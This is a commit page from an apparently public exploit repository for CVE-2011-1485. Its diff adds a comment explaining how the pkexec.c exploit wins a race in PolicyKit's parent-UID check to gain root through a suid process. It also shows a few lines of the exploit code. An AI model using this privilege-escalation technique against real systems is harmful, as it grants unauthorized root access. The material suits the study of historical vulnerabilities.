diff options
| author |   Jason A. Donenfeld <Jason@zx2c4.com> | 2011-09-02 18:50:53 -0400 |
|---|---|---|
| committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-09-02 18:50:53 -0400 |
| commit | 164b5dfcbe58cd5cb813372d89088b71d3d9e7de (patch) | |
| tree | e40d3f998c5c96a3744737f3c07bcd2fc0837873 | |
| parent | Initial import. (diff) | |
| download | CVE-2011-1485-164b5dfcbe58cd5cb813372d89088b71d3d9e7de.tar.xz CVE-2011-1485-164b5dfcbe58cd5cb813372d89088b71d3d9e7de.zip | |
Add message.
| -rw-r--r-- | pkexec.c | 14 |
1 files changed, 13 insertions, 1 deletions
@@ -1,3 +1,16 @@ +/* + * Howdy folks. This exploits CVE-2011-1485, a race condition in PolicyKit. + * pkexec determines the UID of its parent by checking the UID of /proc/PID. + * What they really want to be checking is the EUID but this doesn't do it, + * so the following exploit wins the race by execl'ing to a suid process + * just as pkexec is about to check the UID of the parent process. Greets + * to djrbliss. + * + * - zx2c4 + * 2-sept-2011 + * + */ + #include <stdio.h> #include <stdlib.h> @@ -19,7 +32,6 @@ int main(int argc, char **argv) char pid_path[1024]; sprintf(pid_path, "/proc/%i", getpid()); printf("[+] Configuring inotify for proper pid.\n"); - close(0); close(1); close(2); fd = inotify_init(); if (fd < 0) |